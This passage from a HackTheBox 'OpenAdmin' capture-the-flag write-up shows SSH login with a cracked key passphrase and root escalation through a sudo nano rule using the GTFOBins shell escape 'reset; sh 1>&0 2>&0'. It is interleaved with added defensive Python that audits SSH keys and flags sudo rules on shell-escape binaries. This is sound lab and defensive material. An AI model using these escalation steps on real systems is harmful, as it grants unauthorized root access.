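    lines = [l.strip() for l in text.splitlines()]
    if lines and lines[0] == b"-----BEGIN OPENSSH PRIVATE KEY-----":
        raw = base64.b64decode(b"".join(l for l in lines[1:] if not l.startswith(b"-----")))
        if not raw.startswith(MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(MAGIC)
        cipher, off = _read_string(raw, off)
        kdf, off = _read_string(raw, off)
        kdfopts, off = _read_string(raw, off)
        rounds = 0
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: encryption is signalled by headers; the KDF is always one MD5 round.
    encrypted = any(l.startswith(b"Proc-Type: 4,ENCRYPTED") for l in lines)
    cipher = "none"
    for l in lines:
        if l.startswith(b"DEK-Info:"):
            cipher = l.split(b":", 1)[1].strip().split(b",")[0].decode()
    return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "md5-1-round" if encrypted else "none", "rounds": 1 if encrypted else 0}


def findings(report: dict, mode: Optional[int] = None) -> list:
    """Turn a report (and optionally the file mode) into human-readable findings."""
    out = []
    if not report["encrypted"]:
        out.append("key is not passphrase-protected")
    elif report["format"] == "pem":
        out.append("legacy PEM encryption (single MD5 round): re-encrypt with ssh-keygen -p -a 100")
    elif report["kdf"] == "bcrypt" and report["rounds"] < MIN_BCRYPT_ROUNDS:
        out.append(f"bcrypt rounds too low ({report['rounds']})")
    if mode is not None and mode & (stat.S_IRWXG | stat.S_IRWXO):
        out.append("permissions allow group/other access: chmod 400 the key")
    return out


def audit_file(path: str) -> dict:
    with open(path, "rb") as f:
        report = audit_key_text(f.read())
    report["findings"] = findings(report, os.stat(path).st_mode)
    return report
```

Run audit_file() over a directory of keys to find the ones still in the legacy format; ssh-keygen -p -a 100 -f <key> re-encrypts a key in place with the bcrypt KDF, which turns a seconds-long wordlist run into one that is impractical. The permission finding is the same condition that makes ssh reject a key until chmod 400 is applied.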

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ chmod 400 joanna_rsa

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ ssh -i joanna_rsa joanna@$IP
Enter passphrase for key 'joanna_rsa': bloodninjas
joanna@openadmin:~$ 

Obtaining the user flag

joanna@openadmin:~$ ls
user.txt
joanna@openadmin:~$ cat user.txt 
c9b*****************************

Obtaining root flag

As always, we first run the sudo -l command to see whether there are any commands or tools the user can run with root privileges.

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Nano GTFOBins privilege escalation

As Joanna can run nano as root on the specific file /opt/priv, we can look up nano on GTFOBins to see how to escalate privileges with it. You can see the usage here.
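From the defender's side, the sudoers rule is the finding: restricting nano to /opt/priv changes nothing, because the editor can spawn a shell regardless of which file it was opened on. The following added example (not from the write-up or from GTFOBins) parses sudo -l output and flags rules on binaries whose GTFOBins pages document a shell escape. The sample reuses the box's nano rule and adds two constructed lines; the binary list and severity labels are this example's own choices.

```python
"""Flag sudo rules that grant a root shell through an editor or pager.

Added example, not from the write-up or from GTFOBins. It parses the
'User ... may run the following commands' section of `sudo -l` output and
flags binaries whose GTFOBins pages document a shell escape. The sample
output reuses the box's nano rule and adds two constructed lines; the
binary list and severity labels are this example's own choices.
"""
import re

# Binaries with a documented shell escape: a sudo rule on them is effectively root.
SHELL_ESCAPE_BINARIES = {"nano", "vim", "vi", "less", "more", "man", "find"}

SUDO_L_SAMPLE = """Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/less /var/log/syslog
"""

_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_sudo_l(text: str) -> list:
    """Extract runas, tags, command and args from each rule line of `sudo -l`."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = _RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m["runas"],
                "nopasswd": "NOPASSWD" in m["tags"],
                "cmd": m["cmd"],
                "args": m["args"].strip(),
            })
    return rules


def assess(rule: dict) -> dict:
    """Attach the basename, whether it has a known shell escape, and a severity."""
    binary = rule["cmd"].rsplit("/", 1)[-1]
    escape = binary in SHELL_ESCAPE_BINARIES
    severity = "critical" if escape else "info"
    return {**rule, "binary": binary, "shell_escape": escape, "severity": severity}


def audit(text: str) -> list:
    return [assess(r) for r in parse_sudo_l(text)]


def critical_rules(text: str) -> list:
    """Just the rules that amount to a root shell, rendered as 'runas cmd args'."""
    return [f"({r['runas']}) {r['cmd']} {r['args']}".rstrip()
            for r in audit(text) if r["severity"] == "critical"]
```

The usual fix for the "let a user edit one file as root" requirement is sudoedit: it copies the file to a temporary location, runs the editor as the invoking user, and writes the result back as root, so the editor's shell escape never executes with elevated privileges.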

joanna@openadmin:~$ sudo /bin/nano /opt/priv

The file /opt/priv opens in the nano text editor. We then press CTRL+R followed by CTRL+X, which gives us a Command to execute: prompt. We can then input the following command to get a root shell.

Command to execute:  
Command to execute: reset; sh 1>&0 2>&0
Command to execute: reset; sh 1>&0 2>&0# 

We can try to run some commands to test it.

Command to execute: reset; sh 1>&0 2>&0# id
uid=0(root) gid=0(root) groups=0(root)
# 

Obtaining root flag

# ls /root
root.txt
# cat /root/root.txt
2f9***************************
#

I hope this write-up has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
